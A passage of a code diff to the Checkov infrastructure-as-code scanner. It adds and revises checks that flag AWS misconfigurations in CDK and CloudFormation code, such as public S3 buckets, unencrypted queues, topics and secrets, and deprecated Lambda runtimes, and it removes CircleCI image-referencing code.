   id: CKV2_AWS_6
   name: Ensure that S3 bucket has a Public Access block
   category: NETWORKING
+  framework: cdk
 scope:
   languages:
-    - javascript
     - typescript
 definition:
-  - or:
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import { Bucket } from "aws-cdk-lib/aws-s3"
-              ...
-          - cond_type: pattern
-            operator: equals
-            value: "new Bucket(...)"
-          - cond_type: pattern
-            operator: not_equals
-            value: "new Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)"
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import * as $Y from "aws-cdk-lib/aws-s3"
-              ...
-          - cond_type: pattern
-            operator: equals
-            value: "new $Y.Bucket(...)"
-          - cond_type: pattern
-            operator: not_equals
-            value: "new $Y.Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)"
+  pattern: new $S3.$FUNC(<ANY>)
+  conditions:
+    - metavariable: $FUNC
+      regex: (?i)(Bucket|CfnBucket)
+    - not_pattern: |
+        new $S3.$FUNC(<ANY>, { <ANY>, blockPublicAccess: <ANY> , <ANY> } ,<ANY>)
diff --git a/checkov/cdk/checks/typescript/S3BucketVersioning.yaml b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml
index 0bad75c3468..54addc71e13 100644
--- a/checkov/cdk/checks/typescript/S3BucketVersioning.yaml
+++ b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml
@@ -1,37 +1,24 @@
 metadata:
-  version: '0.1'
+  version: 0.2
   id: CKV_AWS_21
   name: Ensure all data stored in the S3 bucket have versioning enabled
   category: BACKUP_AND_RECOVERY
+  framework: cdk
 scope:
   languages:
     - javascript
     - typescript
 definition:
-  - or:
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import { Bucket } from "aws-cdk-lib/aws-s3"
-              ...
-          - cond_type: pattern
-            operator: equals
-            value: "new Bucket(...)"
-          - cond_type: pattern
-            operator: not_equals
-            value: "new Bucket(..., {..., versioned: true, ...}, ...)"
-      - and:
-          - cond_type: filter
-            attribute: pattern
-            operator: within
-            value: |
-              import * as $Y from "aws-cdk-lib/aws-s3"
-              ...
-          - cond_type: pattern
-            operator: equals
-            value: "new $Y.Bucket(...)"
-          - cond_type: pattern
-            operator: not_equals
-            value: "new $Y.Bucket(..., {..., versioned: true, ...}, ...)"
+  or:
+    - pattern: new $FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(Bucket|CfnBucket)
+        - not_pattern: |
+            'new $FUNC(<ANY>, versioned: true ,<ANY>)'
+    - pattern: new $S3.$FUNC(<ANY>)
+      conditions:
+        - metavariable: $FUNC
+          regex: (?i)(Bucket|CfnBucket)
+        - not_pattern: |
+            'new $S3.$FUNC(<ANY>, versioned: true ,<ANY>)'
diff --git a/checkov/cdk/checks/typescript/S3PublicACLRead.yaml b/checkov/cdk/checks/typescript/S3PublicACLRead.yaml
new file mode 100644
index 00000000000..01d6c284d5f
--- /dev/null
+++ b/checkov/cdk/checks/typescript/S3PublicACLRead.yaml
@@ -0,0 +1,22 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_20
+  name: Ensure the S3 bucket does not allow READ permissions to everyone
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: |
+        new $AWS.Bucket(<ANY>, {<ANY>, accessControl: $ARG, <ANY>}, <ANY> )
+      conditions:
+        or:
+          - metavariable: $ARG
+            pattern: $AWS.BucketAccessControl.PUBLIC_READ
+          - metavariable: $ARG
+            pattern: $AWS.BucketAccessControl.PUBLIC_READ_WRITE
+    -  pattern: |
+          new $AWS.Bucket(<ANY>, { <ANY>, publicReadAccess: true, <ANY>}, <ANY>)
diff --git a/checkov/cdk/checks/typescript/S3RestrictPublicBuckets.yaml b/checkov/cdk/checks/typescript/S3RestrictPublicBuckets.yaml
new file mode 100644
index 00000000000..d9d17ab7c39
--- /dev/null
+++ b/checkov/cdk/checks/typescript/S3RestrictPublicBuckets.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_56
+  name: Ensure S3 bucket has 'restrict_public_buckets' enabled
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.Bucket(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Bucket(<ANY>, { <ANY>, blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL, <ANY> } ,<ANY>)
+      - pattern: new $AWS.CfnBucket(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnBucket(<ANY>, {<ANY>, publicAccessBlockConfiguration: {<ANY>, restrictPublicBuckets: true ,<ANY>}, <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/SNSTopicEncryption.yaml b/checkov/cdk/checks/typescript/SNSTopicEncryption.yaml
new file mode 100644
index 00000000000..ea58416b1e5
--- /dev/null
+++ b/checkov/cdk/checks/typescript/SNSTopicEncryption.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_26
+  name: Ensure all data stored in the SNS topic is encrypted
+  category: Encryption
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.Topic(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.Topic(<ANY>, {<ANY>, masterKey: $ARG ,<ANY> }, <ANY>)
diff --git a/checkov/cdk/checks/typescript/SQSQueueEncryption.yaml b/checkov/cdk/checks/typescript/SQSQueueEncryption.yaml
new file mode 100644
index 00000000000..34cb89e574e
--- /dev/null
+++ b/checkov/cdk/checks/typescript/SQSQueueEncryption.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_27
+  name: Ensure all data stored in the SQS queue is encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.Queue(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Queue(<ANY>, {<ANY>, encryptionMasterKey: $KEY, <ANY>}, <ANY>)
+      - pattern: new $AWS.CfnQueue(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnQueue(<ANY>, {<ANY>, kmsMasterKeyId: $KEY, <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/SecretManagerSecretEncrypted.yaml b/checkov/cdk/checks/typescript/SecretManagerSecretEncrypted.yaml
new file mode 100644
index 00000000000..5bc4d530c83
--- /dev/null
+++ b/checkov/cdk/checks/typescript/SecretManagerSecretEncrypted.yaml
@@ -0,0 +1,22 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_149
+  name: Ensure that Secrets Manager secret is encrypted using KMS CMK
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.Secret(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Secret(<ANY>, {<ANY>, encryptionKey: $KEY ,<ANY>}, <ANY>)
+      - pattern: |
+          new $AWS.Secret(<ANY>, { <ANY>, encryptionKey: $ARG2, <ANY>} , <ANY>)
+        conditions:
+          - metavariable: $ARG2
+            regex: (aws/)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/SecurityGroupRuleDescription.yaml b/checkov/cdk/checks/typescript/SecurityGroupRuleDescription.yaml
new file mode 100644
index 00000000000..1d6160de8e0
--- /dev/null
+++ b/checkov/cdk/checks/typescript/SecurityGroupRuleDescription.yaml
@@ -0,0 +1,31 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_23
+  name: Ensure every security groups rule has a description
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: |
+          new $AWS.CfnSecurityGroup(<ANY>, {<ANY>, securityGroupEgress: [<ANY>] ,<ANY>}, <ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnSecurityGroup(<ANY>, {<ANY>, securityGroupEgress: [<ANY>, {<ANY>,description: 'True',<ANY> }, <ANY>] ,<ANY>}, <ANY>)
+      - pattern: |
+          new $AWS.CfnSecurityGroup(<ANY>, {<ANY>, securityGroupIngress: [<ANY>] ,<ANY>}, <ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnSecurityGroup(<ANY>, {<ANY>, securityGroupIngress: [<ANY>, {<ANY>,description: 'True', <ANY>}, <ANY>] ,<ANY>}, <ANY>)
+      - pattern: new $AWS.CfnSecurityGroupIngress(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnSecurityGroupIngress(<ANY>, {<ANY>, description: $ARG, <ANY>} ,<ANY>)
+      - pattern: new $AWS.CfnSecurityGroupEgress(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnSecurityGroupEgress(<ANY>, {<ANY>, description: $ARG, <ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/TransferServerIsPublic.yaml b/checkov/cdk/checks/typescript/TransferServerIsPublic.yaml
new file mode 100644
index 00000000000..7109ac92105
--- /dev/null
+++ b/checkov/cdk/checks/typescript/TransferServerIsPublic.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_164
+  name: Ensure Transfer Server is not exposed publicly.
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnServer(<ANY>)
+  conditions:
+    - not_pattern: |
+          new $AWS.CfnServer(<ANY>, {<ANY>, endpointType: 'VPC', <ANY>}, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnServer(<ANY>, {<ANY>, endpointType: 'VPC_ENDPOINT', <ANY>}, <ANY>)
diff --git a/checkov/cdk/checks/typescript/VPCEndpointAcceptanceConfigured.yaml b/checkov/cdk/checks/typescript/VPCEndpointAcceptanceConfigured.yaml
new file mode 100644
index 00000000000..32d5e762c5e
--- /dev/null
+++ b/checkov/cdk/checks/typescript/VPCEndpointAcceptanceConfigured.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_123
+  name: Ensure that VPC Endpoint Service is configured for Manual Acceptance
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnVPCEndpointService(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnVPCEndpointService(<ANY>, {<ANY>, acceptanceRequired: true, <ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/WAFEnabled.yaml b/checkov/cdk/checks/typescript/WAFEnabled.yaml
new file mode 100644
index 00000000000..c9147b36654
--- /dev/null
+++ b/checkov/cdk/checks/typescript/WAFEnabled.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_68
+  name: CloudFront Distribution should have WAF enabled
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnDistribution(<ANY>)
+  conditions:
+    - not_pattern: |
+          new $AWS.CfnDistribution(<ANY>, {<ANY>, distributionConfig: {<ANY>, webAclId: $ARG, <ANY>}, <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/WorkspaceRootVolumeEncrypted.yaml b/checkov/cdk/checks/typescript/WorkspaceRootVolumeEncrypted.yaml
new file mode 100644
index 00000000000..f80a62ee4f8
--- /dev/null
+++ b/checkov/cdk/checks/typescript/WorkspaceRootVolumeEncrypted.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_156
+  name: Ensure that Workspace root volumes are encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnWorkspace(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnWorkspace(<ANY>, {<ANY>, rootVolumeEncryptionEnabled: true, <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/WorkspaceUserVolumeEncrypted.yaml b/checkov/cdk/checks/typescript/WorkspaceUserVolumeEncrypted.yaml
new file mode 100644
index 00000000000..99f87558123
--- /dev/null
+++ b/checkov/cdk/checks/typescript/WorkspaceUserVolumeEncrypted.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_155
+  name: Ensure that Workspace user volumes are encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnWorkspace(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnWorkspace(<ANY>, {<ANY>, userVolumeEncryptionEnabled: true, <ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/report.py b/checkov/cdk/report.py
index 5dcb4ec2bab..1437f6fcbdd 100644
--- a/checkov/cdk/report.py
+++ b/checkov/cdk/report.py
@@ -12,7 +12,7 @@ def __init__(self, check_type: str, metadata: Dict[str, Optional[Union[str, int,
         self.language: SastLanguages = language
         self.cdk_report: PrismaReport = cdk_report
         # In case we dont have sast report for this lang
-        self.empty_sast_report: PrismaReport = PrismaReport(rule_match={language: {}}, profiler={}, errors={}, run_metadata={}, imports={}, reachability_report={})
+        self.empty_sast_report: PrismaReport = PrismaReport(rule_match={language: {}}, profiler={}, errors={}, run_metadata={}, imports={}, reachability_report={}, skipped_checks_by_file={})
 
     def get_summary(self) -> Dict[str, Union[int, str]]:
         base_summary: Dict[str, Union[int, str]] = super().get_summary()
diff --git a/checkov/cdk/runner.py b/checkov/cdk/runner.py
index 360f70c1a69..32c03c28096 100644
--- a/checkov/cdk/runner.py
+++ b/checkov/cdk/runner.py
@@ -35,6 +35,7 @@ def run(
 
         for lang in CDKLanguages.set():
             self.cdk_langs.append(lang)
+
         reports = super().run(
             root_folder=root_folder,
             external_checks_dir=external_checks_dir,
diff --git a/checkov/circleci_pipelines/image_referencer/manager.py b/checkov/circleci_pipelines/image_referencer/manager.py
deleted file mode 100644
index 3b4dede972a..00000000000
--- a/checkov/circleci_pipelines/image_referencer/manager.py
+++ /dev/null
@@ -1,12 +0,0 @@
-from __future__ import annotations
-from typing import Any
-
-from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider
-from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager
-
-
-class CircleCIImageReferencerManager(WorkflowImageReferencerManager):
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None:
-        provider = CircleCIProvider(workflow_config=workflow_config, file_path=file_path)
-        super().__init__(workflow_config, file_path, provider)
diff --git a/checkov/circleci_pipelines/image_referencer/provider.py b/checkov/circleci_pipelines/image_referencer/provider.py
deleted file mode 100644
index 04e37861811..00000000000
--- a/checkov/circleci_pipelines/image_referencer/provider.py
+++ /dev/null
@@ -1,50 +0,0 @@
-from __future__ import annotations
-
-from typing import Any, cast
-import jmespath
-from checkov.common.images.image_referencer import Image
-from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider
-from checkov.common.util.consts import START_LINE, END_LINE
-from checkov.yaml_doc.runner import Runner
-
-
-class CircleCIProvider(WorkflowImageReferencerProvider):
-    __slots__ = ("workflow_config", "file_path")
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None:
-        super().__init__(workflow_config, file_path)
-
-    def generate_resource_key(self, start_line: int, end_line: int, tag: str) -> str:
-        sub_name = Runner.resolve_sub_name(self.workflow_config, start_line, end_line, tag)
-        if not sub_name:    # Failed to locate the resource in the config file
-            return ''
-        image_name = Runner.resolve_image_name(self.workflow_config[tag][sub_name], start_line, end_line)
-        new_key = f'{tag}({sub_name}).docker.image{image_name}' if sub_name else tag
-        return new_key
-
-    def extract_images_from_workflow(self) -> list[Image]:
-        images: list[Image] = []
-
-        keywords = (
-            ('jobs', "jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"),
-            ('executors', "executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"),
-        )
-        for tag, keyword in keywords:
-            results = cast("list[dict[str, Any]]", jmespath.search(keyword, self.workflow_config))
-            if not results:
-                continue
-            for result in results:
-                image_name = result.get("image")
-                if image_name:
-                    resource_id = self.generate_resource_key(result[START_LINE], result[END_LINE], tag)
-                    if resource_id:
-                        images.append(
-                            Image(
-                                file_path=self.file_path,
-                                name=image_name,
-                                start_line=result[START_LINE],
-                                end_line=result[END_LINE],
-                                related_resource_id=resource_id,
-                            )
-                        )
-        return images
diff --git a/checkov/circleci_pipelines/runner.py b/checkov/circleci_pipelines/runner.py
index 438f5e76acc..5fe6eafe297 100644
--- a/checkov/circleci_pipelines/runner.py
+++ b/checkov/circleci_pipelines/runner.py
@@ -4,22 +4,18 @@
 import os
 from typing import TYPE_CHECKING, Any, Iterable
 
-from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager
-from checkov.common.images.image_referencer import Image, ImageReferencerMixin
-from checkov.common.output.report import CheckType, Report
 from checkov.circleci_pipelines.registry import registry
-from checkov.common.util.type_forcers import force_dict
+from checkov.common.output.report import CheckType, Report
 from checkov.runner_filter import RunnerFilter
 from checkov.yaml_doc.runner import Runner as YamlRunner
 
 if TYPE_CHECKING:
     from checkov.common.checks.base_check_registry import BaseCheckRegistry
-    from networkx import DiGraph
 
 WORKFLOW_DIRECTORY = "circleci"
 
 
-class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner):
+class Runner(YamlRunner):
     check_type = CheckType.CIRCLECI_PIPELINES  # noqa: CCE003  # a static attribute
 
     def require_external_checks(self) -> bool:
@@ -89,37 +85,4 @@ def run(
         runner_filter = runner_filter or RunnerFilter()
         report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir,
                              files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments)
-        if runner_filter.run_image_referencer:
-            if files:
-                # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form
-                root_folder = os.path.split(os.path.commonprefix(files))[0]
-
-            image_report = self.check_container_image_references(
-                root_path=root_folder,
-                runner_filter=runner_filter,
-                definitions=self.definitions
-            )
-
-            if image_report:
-                return [report, image_report]  # type:ignore[list-item]  # report can only be of type Report, not a list
-
         return report
-
-    def extract_images(
-        self,
-        graph_connector: DiGraph | None = None,
-        definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None,
-        definitions_raw: dict[str, list[tuple[int, str]]] | None = None
-    ) -> list[Image]:
-        images: list[Image] = []
-        if not definitions:
-            return images
-
-        for file_path, config in definitions.items():
-            _config = force_dict(config) or {}
-            if not config:
-                continue
-            manager = CircleCIImageReferencerManager(workflow_config=_config, file_path=file_path)
-            images.extend(manager.extract_images_from_workflow())
-
-        return images
diff --git a/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml
new file mode 100644
index 00000000000..b290a69deb8
--- /dev/null
+++ b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml
@@ -0,0 +1,25 @@
+metadata:
+  id: "CKV2_AWS_68"
+  name: "Ensure SageMaker notebook instance IAM policy is not overly permissive"
+  category: "NETWORKING"
+
+definition:
+  and:
+    - cond_type: filter
+      value:
+        - AWS::SageMaker::NotebookInstance
+      operator: within
+      attribute: resource_type
+    - cond_type: connection
+      resource_types:
+        - AWS::SageMaker::NotebookInstance
+      connected_resource_types:
+        - AWS::IAM::Role
+      operator: exists
+    - cond_type: attribute
+      resource_types:
+        - AWS::IAM::Role
+      attribute: "AssumeRolePolicyDocument.Statement[?(@.Effect == Allow)].Action[*]"
+      operator: "jsonpath_not_equals"
+      value: "*"
+
diff --git a/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py b/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py
index 69714fd7e48..1448d5af8cc 100644
--- a/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py
+++ b/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py
@@ -1,5 +1,6 @@
 from __future__ import annotations
 
+import fnmatch
 import json
 import logging
 from abc import abstractmethod
@@ -66,6 +67,7 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
                         if statement_key in converted_policy_doc:
                             policy_statement = PolicyDocument(converted_policy_doc)
                             self.policy_document_cache[self.entity_path][policy.get("PolicyName")] = policy_statement
+                    self.cloudsplaining_enrich_evaluated_keys(policy_statement)
                     violations = self.cloudsplaining_analysis(policy_statement)
                     if violations:
                         logging.debug(f"detailed cloudsplaining finding: {json.dumps(violations)}")
@@ -79,3 +81,27 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
     @abstractmethod
     def cloudsplaining_analysis(self, policy: PolicyDocument) -> list[str]:
         raise NotImplementedError()
+
+    def cloudsplaining_enrich_evaluated_keys(self, policy: PolicyDocument) -> None:
+        try:
+            violating_actions = self.cloudsplaining_analysis(policy)
+            if violating_actions:
+                # in case we have violating actions for this policy we start looking for it through the statements
+                for stmt_idx, statement in enumerate(policy.statements):
+                    actions = statement.statement.get('Action')  # get the actions for this statement
+                    if actions:
+                        if isinstance(actions, str):
+                            for violating_action in violating_actions:
+                                if fnmatch.fnmatch(violating_action, actions):  # found the violating action in our list of actions
+                                    self.evaluated_keys = [f"Properties/PolicyDocument/Statement/[{stmt_idx}]/Action"]
+                                    break
+                        if isinstance(actions, list):
+                            for action_idx, action in enumerate(actions):      # go through the actions of this statement and try to match one violation
+                                for violating_action in violating_actions:
+                                    if fnmatch.fnmatch(violating_action, action):      # found the violating action in our list of actions
+                                        self.evaluated_keys.append(
+                                            f"Properties/PolicyDocument/Statement/[{stmt_idx}]/Action/[{action_idx}]/"
+                                        )
+                                        break
+        except Exception as e:
+            logging.warning(f'Failed enriching cloudsplaining evaluated keys due to: {e}')
diff --git a/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py b/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py
new file mode 100644
index 00000000000..52e0db39ea7
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py
@@ -0,0 +1,21 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+from checkov.common.models.consts import ANY_VALUE
+
+
+class BedrockAgentEncrypted(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Bedrock Agent is encrypted with a CMK"
+        id = "CKV_AWS_373"
+        supported_resources = ['AWS::Bedrock::Agent']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'Properties/CustomerEncryptionKeyArn'
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = BedrockAgentEncrypted()
diff --git a/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py
new file mode 100644
index 00000000000..ac11a53234c
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py
@@ -0,0 +1,28 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CognitoUnauthenticatedIdentities(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access"
+        id = "CKV_AWS_366"
+        supported_resources = ('AWS::Cognito::IdentityPool',)
+        categories = (CheckCategories.IAM,)
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+            missing_block_result=CheckResult.FAILED,
+        )
+
+    def get_expected_value(self) -> Any:
+        return False
+
+    def get_inspected_key(self) -> str:
+        return 'Properties/AllowUnauthenticatedIdentities'
+
+
+check = CognitoUnauthenticatedIdentities()
diff --git a/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py b/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py
index 9f8a459dd0c..3f64dde9a4d 100644
--- a/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py
+++ b/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py
@@ -5,7 +5,7 @@
 
 
 class DeprecatedLambdaRuntime(BaseResourceNegativeValueCheck):
-    def __init__(self):
+    def __init__(self) -> None:
         name = "Ensure Lambda Runtime is not deprecated"
         id = "CKV_AWS_363"
         supported_resources = ['AWS::Lambda::Function', 'AWS::Serverless::Function']
@@ -16,17 +16,14 @@ def get_inspected_key(self) -> str:
         return "Properties/Runtime"
 
     def get_forbidden_values(self) -> List[Any]:
+        # Source: https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtimes.html
         return ["dotnetcore3.1", "nodejs12.x", "python3.6", "python2.7", "dotnet5.0", "dotnetcore2.1", "ruby2.5",
                 "nodejs10.x", "nodejs8.10", "nodejs4.3", "nodejs6.10", "dotnetcore1.0", "dotnetcore2.0",
-                "nodejs4.3-edge", "nodejs",
-                # "python3.7", # Uncomment on Nov 27, 2023
-                # "nodejs14.x", # Uncomment on Nov 27, 2023
-                # "ruby2.7", # Uncomment on Dec 7, 2023
-                # "provided", # Uncomment on Dec 31, 2023
-                # "go1.x", # Uncomment on Dec 31, 2023
-                # "java8", # Uncomment on Dec 31, 2023
-                # "nodejs16.x", # Uncomment on Mar 11, 2024
+                "nodejs4.3-edge", "nodejs", "java8", "python3.7", "go1.x", "provided", "ruby2.7", "nodejs14.x"
+                # "nodejs16.x", # Uncomment on Jun 12, 2024
+                # "python3.8". # Uncomment on Oct 14, 2024
                 # "dotnet7", # Uncomment on May 14, 2024
+                # "dotnet6", # Uncomment on Nov 12, 2024
                 ]
 
 
diff --git a/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py b/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py
index 83ce8062abe..fbe70e3625f 100644
--- a/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py
+++ b/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py
@@ -1,4 +1,4 @@
-from typing import Any
+from typing import Any, List
 
 from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
 from checkov.common.models.enums import CheckCategories
@@ -15,8 +15,8 @@ def __init__(self) -> None:
     def get_inspected_key(self) -> str:
         return "Properties/Parameters/audit_logs"
 
-    def get_expected_value(self) -> Any:
-        return "enabled"
+    def get_expected_values(self) -> List[Any]:
+        return ["all", "ddl", "dml_read", "dml_write", "enabled"]
 
 
 check = DocDBAuditLogs()
diff --git a/checkov/cloudformation/checks/resource/aws/ECRPolicy.py b/checkov/cloudformation/checks/resource/aws/ECRPolicy.py
index 6fe40d5ab44..cd7a6a04a0f 100644
--- a/checkov/cloudformation/checks/resource/aws/ECRPolicy.py
+++ b/checkov/cloudformation/checks/resource/aws/ECRPolicy.py
@@ -48,11 +48,17 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
         if "Statement" in policy_text.keys() and isinstance(policy_text["Statement"], list):
             for statement_index, statement in enumerate(policy_text["Statement"]):
                 if "Principal" in statement.keys():
-                    for principal_index, principal in enumerate(statement["Principal"]):
+                    principal_block = statement["Principal"]
+                    evaluated_key = f"Properties/RepositoryPolicyText/Statement/[{statement_index}]/Principal"
+                    if isinstance(principal_block, dict) and 'AWS' in principal_block:
+                        principal_block = principal_block['AWS']
+                        evaluated_key += "/AWS"
+                    for principal_index, principal in enumerate(principal_block):
                         if principal == "*" and not self.check_for_constrained_condition(statement):
-                            self.evaluated_keys = [
-                                f"Properties/RepositoryPolicyText/Statement/[{statement_index}]/Principal/[{principal_index}]"
-                            ]
+                            if isinstance(principal_block, list):
+                                self.evaluated_keys = [f"{evaluated_key}/[{principal_index}]/"]
+                            else:
+                                self.evaluated_keys = [f"{evaluated_key}"]
                             return CheckResult.FAILED
         return CheckResult.PASSED
 
diff --git a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
index 39a5a1a0f31..6bddcecb7a1 100644
--- a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
+++ b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
@@ -23,7 +23,8 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
         """
         properties = conf. get("Properties")
         if properties and isinstance(properties, dict):
-            if "TransitEncryptionEnabled" in properties.keys() and "AuthToken" in properties.keys():
+            if "TransitEncryptionEnabled" in properties.keys() and ("AuthToken" in properties.keys() or
+                                                                    "UserGroupIds" in properties.keys()):
                 if conf["Properties"]["TransitEncryptionEnabled"]:
                     return CheckResult.PASSED
         return CheckResult.FAILED
diff --git a/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py b/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py
index 84160b68dbe..ae1d956cc4c 100644
